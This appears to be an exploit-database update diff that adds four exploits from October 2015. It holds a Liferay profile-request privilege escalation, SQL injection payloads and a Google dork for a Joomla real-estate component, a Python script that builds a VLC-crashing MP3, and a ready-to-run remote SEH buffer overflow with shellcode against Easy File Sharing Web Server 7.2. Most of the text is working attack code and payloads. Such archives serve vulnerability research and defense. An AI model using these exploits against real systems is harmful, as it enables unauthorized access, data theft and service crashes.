DB: 2015-10-25

4 new exploits

files.csv

@@ -34727,7 +34727,9 @@ id,file,description,date,author,platform,type,port
 38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0
 38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
 38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
+38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0
 38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
+38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL injection",2015-10-11,"Omer Ramić",php,webapps,0
 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0
 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
@@ -34761,6 +34763,7 @@ id,file,description,date,author,platform,type,port
 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help <= 3.1.2 Remote File Include and Path Disclosure Vulnerabilities",2013-04-19,ITTIHACK,php,webapps,0
 38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
 38484,platforms/php/webapps/38484.rb,"Wordpress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability",2015-10-18,PizzaHatHacker,php,webapps,0
+38485,platforms/windows/dos/38485.py,"VLC 2.2.1 libvlccore - (.mp3) Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0
 38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
 38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0
 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal Vulnerability",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
@@ -34800,5 +34803,6 @@ id,file,description,date,author,platform,type,port
 38523,platforms/php/webapps/38523.txt,"Weyal CMS Multiple SQL Injection Vulnerabilities",2013-05-23,XroGuE,php,webapps,0
 38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0
 38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0
+38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0

platforms/php/webapps/38443.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation
+# Date: 18/05/2015
+# Exploit Author: Massimo De Luca - mentat.is
+# Vendor Homepage: https://www.liferay.com
+# Software Link:
+http://www.liferay.com/it/community/releases/-/asset_publisher/nSr2/content/id/18060360
+# Version: 6.1.0 CE
+# Tested on: -
+
+Explanation:
+Any logged user can change his "User Group" membership by editing the
+parameter _2_userGroupsSearchContainerPrimaryKeys in the HTTP POST REQUEST
+generated when updating his profile in the page "Manage my account". This
+may lead to privilege escalation.
+
+
+Proof of Concept:
+
+POST
+/group/control_panel/manage?p_auth=J3jbveH7&p_p_id=2&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&doAsGroupId=19&refererPlid=10839&controlPanelCategory=my&_2_struts_action=%2Fmy_account%2Fedit_user
+HTTP/1.1
+[...]
+[...]_2_organizationsSearchContainerPrimaryKeys=&_2_groupsSearchContainerPrimaryKeys=19&_2_userGroupsSearchContainerPrimaryKeys=[NEW
+GROUP ID]&_2_groupRolesRoleIds=[...]
+
+
+For your reference i'm attaching the full request in a separate file.
+
+In order to test the vulnerability on a fresh installation:
+- Create two different groups with different roles and permissions (ie:
+one with administrator permissions, and a regular user)
+-Create two different users,one for each group
+
+Solution:
+The vendor is aware of the problem and has fixed the issue in newer
+releases
+
+
+#Massimo De Luca
+#mdeluca [at] mentat.is
+#Mentat.is

platforms/php/webapps/38445.txt

@@ -0,0 +1,58 @@
+# Description of component:
+This Joomla component is perfect for independent estate agents, property
+rental companies and agencies, hotel booking, hotel manage, motel booking,
+motel manage.
+
+##################################################################################################
+# Exploit Title: [Joomla component com_realestatemanager - SQL injection]
+# Google Dork: [inurl:option=com_realestatemanager]
+# Date: [2015-10-10]
+# Exploit Author: [Omer Ramić]
+# Vendor Homepage: [http://ordasoft.com/]
+# Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
+# Version: [3.7] & probably all prior
+#Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
+##################################################################################################
+
+#Multiple vulnerable parameters (POC given only for the first parametar):
+Parameter_1: order_direction (POST)
+Parameter_2: order_field (POST)
+
+
+#The vulnerable parameters 1 & 2 are within the following request:
+POST
+/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
+HTTP/1.1
+Host: [HOST]
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101
+Firefox/38.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://
+[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
+Cookie: security_level=0;
+9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 37
+
+order_direction=asc&order_field=price
+
+
+
+#Vectors:
+POC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE
+7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)
+END))&order_field=price
+
+POC_2: order_direction=asc,(SELECT 1841 FROM(SELECT
+COUNT(*),CONCAT(0x716b787671,(SELECT
+(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM
+
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price
+
+
+###################################
+# Greets to Palestine from Bosnia          #
+###################################

platforms/windows/dos/38485.py

@@ -0,0 +1,42 @@
+# Exploit Title: VLC | libvlccore - (.mp3) Stack Overflow
+# Date: 18/10/2015
+# Exploit Author: Andrea Sindoni
+# Software Link: https://www.videolan.org/vlc/index.it.html
+# Version: 2.2.1
+# Tested on: Windows 7 Professional 64 bits
+#
+# PoC with MP3: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38485.zip
+#
+
+#APP:  vlc.exe
+#ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre
+#FOLLOWUP_NAME:  MachineOwner
+#MODULE_NAME: libvlccore
+#IMAGE_NAME:  libvlccore.dll
+#FAILURE_ID_HASH_STRING:  um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd
+#Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62
+#EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
+#ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3)
+#  ExceptionCode: c00000fd (Stack overflow)
+#  ExceptionFlags: 00000000
+#NumberParameters: 2
+#   Parameter[0]: 0000000000000001
+#   Parameter[1]: 0000000025ed2a20
+#
+#eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001
+#eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0         nv up ei pl nz na po nc
+#cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+#
+#Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62)
+#
+
+import eyed3
+
+value = u'B'*6500000
+
+audiofile = eyed3.load("base.mp3")
+audiofile.tag.artist = value
+audiofile.tag.album = u'andrea'
+audiofile.tag.album_artist = u'sindoni'
+
+audiofile.tag.save() 

platforms/windows/remote/38526.py

@@ -0,0 +1,90 @@
+#!/usr/bin/env python
+# Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
+# The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
+# vulnerable file /changeuser.ghp > Cookies UserID=[buf]
+# Means there are two ways to exploit changeuser.ghp
+# Tested on Win7 x64 and x86, it should work on win8/win10
+# By Audit0r
+# https://twitter.com/Audit0rSA
+
+
+import sys, socket, struct
+ 
+
+if len(sys.argv) <= 1:
+    print "Usage: python efsws.py [host] [port]"
+    exit()
+ 
+host = sys.argv[1]    
+port = int(sys.argv[2])
+
+
+# https://code.google.com/p/win-exec-calc-shellcode/
+shellcode = (
+
+"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
+
+"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
+
+"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
+
+"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
+
+"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
+
+"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
+
+"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
+
+"\x1c\x39\xbd"
+
+)
+
+print "[+]Connecting to" + host
+
+
+craftedreq =  "A"*4059
+
+craftedreq += "\xeb\x06\x90\x90"     		 # basic SEH jump
+
+craftedreq += struct.pack("<I", 0x10017743)      # pop commands from ImageLoad.dll                         
+
+craftedreq += "\x90"*40                          # NOPer
+
+craftedreq += shellcode                         
+
+craftedreq += "C"*50                             # filler
+
+
+
+httpreq = (
+
+"GET /changeuser.ghp HTTP/1.1\r\n"
+
+"User-Agent: Mozilla/4.0\r\n"
+
+"Host:" + host + ":" + str(port) + "\r\n"
+
+"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+
+"Accept-Language: en-us\r\n"
+
+"Accept-Encoding: gzip, deflate\r\n"
+
+"Referer: http://" + host + "/\r\n"
+
+"Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n"
+
+"Conection: Keep-Alive\r\n\r\n"
+)
+
+
+print "[+]Sending the Calc...."
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+s.connect((host, port))
+
+s.send(httpreq)
+
+s.close()